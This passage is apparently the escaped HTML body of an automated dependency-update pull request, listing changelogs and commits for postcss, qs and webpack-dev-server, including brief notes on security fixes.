href=\"https://github.com/git-sumitchaudhary\"\u003e\u003ccode\u003e@​git-sumitchaudhary\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.3\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded more details to \u003ccode\u003eUnknown word\u003c/code\u003e error (by \u003ca href=\"https://github.com/hiepxanh\"\u003e\u003ccode\u003e@​hiepxanh\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003eFixed types (by \u003ca href=\"https://github.com/romainmenke\"\u003e\u003ccode\u003e@​romainmenke\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003eFixed docs (by \u003ca href=\"https://github.com/catnipan\"\u003e\u003ccode\u003e@​catnipan\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.2\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed end position of rules with semicolon (by \u003ca href=\"https://github.com/romainmenke\"\u003e\u003ccode\u003e@​romainmenke\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed backwards compatibility for complex cases (by \u003ca href=\"https://github.com/romainmenke\"\u003e\u003ccode\u003e@​romainmenke\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5 “Duke Alloces”\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003cp\u003ePostCSS 8.5 brought API to work better with non-CSS sources like HTML, Vue.js/Svelte sources or CSS-in-JS.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/romainmenke\"\u003e\u003ccode\u003e@​romainmenke\u003c/code\u003e\u003c/a\u003e during \u003ca href=\"https://redirect.github.com/postcss/postcss/issues/1995\"\u003ehis work\u003c/a\u003e on \u003ca href=\"https://stylelint.io\"\u003eStylelint\u003c/a\u003e added \u003ccode\u003eInput#document\u003c/code\u003e in additional to \u003ccode\u003eInput#css\u003c/code\u003e.\u003c/p\u003e\n\u003cpre lang=\"js\"\u003e\u003ccode\u003eroot.source.input.document //=\u0026gt; \u0026quot;\u0026lt;p\u0026gt;Hello\u0026lt;/p\u0026gt;\r\n                           //    \u0026lt;style\u0026gt;\r\n                           //    p {\r\n                           //      color: green;\r\n                           //    }\r\n                           //    \u0026lt;/style\u0026gt;\u0026quot;\r\nroot.source.input.css      //=\u0026gt; \u0026quot;p {\r\n                           //      color: green;\r\n                           //    }\u0026quot;\r\n\u003cp\u003e\u0026lt;/tr\u0026gt;\u0026lt;/table\u0026gt;\u003cbr /\u003e\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/postcss/postcss/blob/main/CHANGELOG.md\"\u003epostcss's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e8.5.10\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed XSS via unescaped \u003ccode\u003e\u0026lt;/style\u0026gt;\u003c/code\u003e in non-bundler cases (by \u003ca href=\"https://github.com/TharVid\"\u003e\u003ccode\u003e@​TharVid\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.9\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSpeed up source map encoding paring in case of the error.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.8\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003eProcessor#version\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.7\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImproved source map annotation cleaning performance (by CodeAnt AI).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.6\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003eContainerWithChildren\u003c/code\u003e type discriminating (by \u003ca href=\"https://github.com/Goodwine\"\u003e\u003ccode\u003e@​Goodwine\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.5\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003epackage.json\u003c/code\u003e→\u003ccode\u003eexports\u003c/code\u003e compatibility with some tools (by \u003ca href=\"https://github.com/JounQin\"\u003e\u003ccode\u003e@​JounQin\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.4\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed Parcel compatibility issue (by \u003ca href=\"https://github.com/git-sumitchaudhary\"\u003e\u003ccode\u003e@​git-sumitchaudhary\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.3\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded more details to \u003ccode\u003eUnknown word\u003c/code\u003e error (by \u003ca href=\"https://github.com/hiepxanh\"\u003e\u003ccode\u003e@​hiepxanh\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003eFixed types (by \u003ca href=\"https://github.com/romainmenke\"\u003e\u003ccode\u003e@​romainmenke\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003eFixed docs (by \u003ca href=\"https://github.com/catnipan\"\u003e\u003ccode\u003e@​catnipan\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.2\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed end position of rules with semicolon (by \u003ca href=\"https://github.com/romainmenke\"\u003e\u003ccode\u003e@​romainmenke\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed backwards compatibility for complex cases (by \u003ca href=\"https://github.com/romainmenke\"\u003e\u003ccode\u003e@​romainmenke\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5 “Duke Alloces”\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded \u003ccode\u003eInput#document\u003c/code\u003e for sources like CSS-in-JS or HTML (by \u003ca href=\"https://github.com/romainmenke\"\u003e\u003ccode\u003e@​romainmenke\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.4.49\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed custom syntax without \u003ccode\u003esource.offset\u003c/code\u003e (by \u003ca href=\"https://github.com/romainmenke\"\u003e\u003ccode\u003e@​romainmenke\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/33b9790263dc1562a46ce45d9532bd63e95b7986\"\u003e\u003ccode\u003e33b9790\u003c/code\u003e\u003c/a\u003e Release 8.5.10 version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/536c79e4b01e58a3a56b09c3c0cf2323f4b9a28b\"\u003e\u003ccode\u003e536c79e\u003c/code\u003e\u003c/a\u003e Escape \u0026lt;/style\u0026gt; in CSS output (\u003ca href=\"https://redirect.github.com/postcss/postcss/issues/2074\"\u003e#2074\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/afa96b2a139ce625c4d27973313479c7c85f39d4\"\u003e\u003ccode\u003eafa96b2\u003c/code\u003e\u003c/a\u003e Update dependencies (\u003ca href=\"https://redirect.github.com/postcss/postcss/issues/2073\"\u003e#2073\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/effe88bb87cabdc1876e02adbdd30f392f19f40d\"\u003e\u003ccode\u003eeffe88b\u003c/code\u003e\u003c/a\u003e Typo (\u003ca href=\"https://redirect.github.com/postcss/postcss/issues/2072\"\u003e#2072\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/3ee79a2c4a11e41d52db50b444eebe38299495ad\"\u003e\u003ccode\u003e3ee79a2\u003c/code\u003e\u003c/a\u003e Thread model (\u003ca href=\"https://redirect.github.com/postcss/postcss/issues/2071\"\u003e#2071\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/2e0683daca4dc2919211b03774f6b2d137136c01\"\u003e\u003ccode\u003e2e0683d\u003c/code\u003e\u003c/a\u003e Create incident response docs (\u003ca href=\"https://redirect.github.com/postcss/postcss/issues/2070\"\u003e#2070\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/fe88ac29c06b7b218be32994cdc6ca1525bdf2c9\"\u003e\u003ccode\u003efe88ac2\u003c/code\u003e\u003c/a\u003e Release 8.5.9 version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/c551632496b87ab3f1965bfda5dc386b6c71963e\"\u003e\u003ccode\u003ec551632\u003c/code\u003e\u003c/a\u003e Avoid RegExp when we can use simple JS\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/89a6b744060eb8dee743351c785a9fbe37d4525a\"\u003e\u003ccode\u003e89a6b74\u003c/code\u003e\u003c/a\u003e Move SECURITY.txt for docs folder to keep GitHub page cleaner\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/6ceb8a46af9f9de821faee98f861bdf84617347b\"\u003e\u003ccode\u003e6ceb8a4\u003c/code\u003e\u003c/a\u003e Create SECURITY.md\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/postcss/postcss/compare/8.4.31...8.5.10\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `qs` from 6.11.2 to 6.15.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/ljharb/qs/blob/main/CHANGELOG.md\"\u003eqs's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003cstrong\u003e6.15.2\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined entries in \u003ccode\u003earrayFormat: 'comma'\u003c/code\u003e + \u003ccode\u003eencodeValuesOnly\u003c/code\u003e instead of crashing in \u003ccode\u003eencoder\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: use configured \u003ccode\u003edelimiter\u003c/code\u003e after \u003ccode\u003echarsetSentinel\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/555\"\u003e#555\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: apply \u003ccode\u003eformatter\u003c/code\u003e to encoded key under \u003ccode\u003estrictNullHandling\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/554\"\u003e#554\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined filter-array entries instead of crashing in \u003ccode\u003eencoder\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/551\"\u003e#551\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: handle nested bracket groups and add regression tests (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/530\"\u003e#530\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] fix grammar (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/550\"\u003e#550\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] add regression tests for keys containing percent-encoded bracket text\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.15.1\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: \u003ccode\u003eparameterLimit: Infinity\u003c/code\u003e with \u003ccode\u003ethrowOnLimitExceeded: true\u003c/code\u003e silently drops all parameters\u003c/li\u003e\n\u003cli\u003e[Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e, \u003ccode\u003eiconv-lite\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] increase coverage\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.15.0\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[New] \u003ccode\u003eparse\u003c/code\u003e: add \u003ccode\u003estrictMerge\u003c/code\u003e option to wrap object/primitive conflicts in an array (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/425\"\u003e#425\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/ljharb/qs/issues/122\"\u003e#122\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eduplicates\u003c/code\u003e option should not apply to bracket notation keys (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/514\"\u003e#514\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.14.2\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: mark overflow objects for indexed notation exceeding \u003ccode\u003earrayLimit\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/546\"\u003e#546\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003earrayLimit\u003c/code\u003e means max count, not max index, in \u003ccode\u003ecombine\u003c/code\u003e/\u003ccode\u003emerge\u003c/code\u003e/\u003ccode\u003eparseArrayValue\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: throw on \u003ccode\u003earrayLimit\u003c/code\u003e exceeded with indexed notation when \u003ccode\u003ethrowOnLimitExceeded\u003c/code\u003e is true (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/529\"\u003e#529\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: enforce \u003ccode\u003earrayLimit\u003c/code\u003e on \u003ccode\u003ecomma\u003c/code\u003e-parsed values\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: fix error message to reflect arrayLimit as max index; remove extraneous comments (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/545\"\u003e#545\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Robustness] avoid \u003ccode\u003e.push\u003c/code\u003e, use \u003ccode\u003evoid\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[readme] document that \u003ccode\u003eaddQueryPrefix\u003c/code\u003e does not add \u003ccode\u003e?\u003c/code\u003e to empty output (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/418\"\u003e#418\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] clarify \u003ccode\u003eparseArrays\u003c/code\u003e and \u003ccode\u003earrayLimit\u003c/code\u003e documentation (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/543\"\u003e#543\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] replace runkit CI badge with shields.io check-runs badge\u003c/li\u003e\n\u003cli\u003e[meta] fix changelog typo (\u003ccode\u003earrayLength\u003c/code\u003e → \u003ccode\u003earrayLimit\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003e[actions] fix rebase workflow permissions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.14.1\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] ensure \u003ccode\u003earrayLimit\u003c/code\u003e applies to \u003ccode\u003e[]\u003c/code\u003e notation as well\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: when a custom decoder returns \u003ccode\u003enull\u003c/code\u003e for a key, ignore that key\u003c/li\u003e\n\u003cli\u003e[Refactor] \u003ccode\u003eparse\u003c/code\u003e: extract key segment splitting helper\u003c/li\u003e\n\u003cli\u003e[meta] add threat model\u003c/li\u003e\n\u003cli\u003e[actions] add workflow permissions\u003c/li\u003e\n\u003cli\u003e[Tests] \u003ccode\u003estringify\u003c/code\u003e: increase coverage\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003eeslint\u003c/code\u003e, \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e, \u003ccode\u003enpmignore\u003c/code\u003e, \u003ccode\u003ees-value-fixtures\u003c/code\u003e, \u003ccode\u003efor-each\u003c/code\u003e, \u003ccode\u003eobject-inspect\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.14.0\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[New] \u003ccode\u003eparse\u003c/code\u003e: add \u003ccode\u003ethrowOnParameterLimitExceeded\u003c/code\u003e option (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/517\"\u003e#517\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Refactor] \u003ccode\u003eparse\u003c/code\u003e: use \u003ccode\u003eutils.combine\u003c/code\u003e more\u003c/li\u003e\n\u003cli\u003e[patch] \u003ccode\u003eparse\u003c/code\u003e: add explicit \u003ccode\u003ethrowOnLimitExceeded\u003c/code\u003e default\u003c/li\u003e\n\u003cli\u003e[actions] use shared action; re-add finishers\u003c/li\u003e\n\u003cli\u003e[meta] Fix changelog formatting bug\u003c/li\u003e\n\u003cli\u003e[Deps] update \u003ccode\u003eside-channel\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003ees-value-fixtures\u003c/code\u003e, \u003ccode\u003ehas-bigints\u003c/code\u003e, \u003ccode\u003ehas-proto\u003c/code\u003e, \u003ccode\u003ehas-symbols\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/9aca4076fe788338c67cf7e115f0be6bc58d85a8\"\u003e\u003ccode\u003e9aca407\u003c/code\u003e\u003c/a\u003e v6.15.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/5e33d33447ed0bf1ddab9abc41d27dea4687d992\"\u003e\u003ccode\u003e5e33d33\u003c/code\u003e\u003c/a\u003e [Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/21f80b33e5c8b3f7eba1034fff0da4a4a37a1d41\"\u003e\u003ccode\u003e21f80b3\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined entries in \u003ccode\u003earrayFormat: 'comma'\u003c/code\u003e + `e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/a0a81ea2071acce3eff41a040f719ac8f5c4f64c\"\u003e\u003ccode\u003ea0a81ea\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: use configured \u003ccode\u003edelimiter\u003c/code\u003e after \u003ccode\u003echarsetSentinel\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/e3062f78f5233b338ceeb8e8dfa5a07dea4b32a8\"\u003e\u003ccode\u003ee3062f7\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: apply \u003ccode\u003eformatter\u003c/code\u003e to encoded key under \u003ccode\u003estrictNullHandling\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/0c180a40adb8c6703fffc85b2ff06ca209f5c1e0\"\u003e\u003ccode\u003e0c180a4\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined filter-array entries instead of crashi...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/3a8b94aec19bd664720f6f6b1e66c4a0dfe4b656\"\u003e\u003ccode\u003e3a8b94a\u003c/code\u003e\u003c/a\u003e [Tests] add regression tests for keys containing percent-encoded bracket text\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/96755abd357c0e534dd3442a84a04d08864bfe0d\"\u003e\u003ccode\u003e96755ab\u003c/code\u003e\u003c/a\u003e [readme] fix grammar\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/a419ce5bbfcdb98a299f1a0bb47ea055baef20e6\"\u003e\u003ccode\u003ea419ce5\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003eparse\u003c/code\u003e: handle nested bracket groups and add regression tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/3f5e1c528c967d915096787efbffa73cf6044170\"\u003e\u003ccode\u003e3f5e1c5\u003c/code\u003e\u003c/a\u003e v6.15.1\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/ljharb/qs/compare/v6.11.2...v6.15.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `webpack-dev-server` from 3.3.1 to 5.2.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/releases\"\u003ewebpack-dev-server's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.2.4\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.3\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.2\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.1...v5.2.2\"\u003e5.2.2\u003c/a\u003e (2025-06-03)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u0026quot;Overlay enabled\u0026quot; false positive (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/18e72ee3e57a6e7598a6c068c0ff7c7bb6a857f1\"\u003e18e72ee\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edo not crush when error is null for runtime errors (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5447\"\u003e#5447\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/309991f947baa0354140b9930a9654ac792e20c4\"\u003e309991f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove unnecessary header \u003ccode\u003eX_TEST\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5451\"\u003e#5451\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/64a6124bf1b4d158bb42a4341dd03121ae3759fa\"\u003e64a6124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erespect the \u003ccode\u003eallowedHosts\u003c/code\u003e option for cross-origin header check (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5510\"\u003e#5510\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/03d12141bf7be09dfb14e91e5c834ee63bd9a9a2\"\u003e03d1214\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.0...v6.0.0\"\u003e5.2.1\u003c/a\u003e (2025-03-26)\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ecross-origin requests are not allowed unless allowed by \u003ccode\u003eAccess-Control-Allow-Origin\u003c/code\u003e header\u003c/li\u003e\n\u003cli\u003erequests with an IP addresses in the \u003ccode\u003eOrigin\u003c/code\u003e header are not allowed to connect to WebSocket server unless configured by \u003ccode\u003eallowedHosts\u003c/code\u003e or it different from the \u003ccode\u003eHost\u003c/code\u003e header\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThe above changes may make the dev server not work if you relied on such behavior, but unfortunately they carry security risks, so they were considered as fixes.\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eprevent overlay for errors caught by React error boundaries (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5431\"\u003e#5431\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/8c1abc903ab444d9ce99e567b9a6c603e1ec06be\"\u003e8c1abc9\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003etake the first network found instead of the last one, this restores the same behavior as 5.0.4 (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5411\"\u003e#5411\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ffd0b86b790d372f90e17aea92cfd9def83fee96\"\u003effd0b86\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.0\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.1.0...v5.2.0\"\u003e5.2.0\u003c/a\u003e (2024-12-11)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... 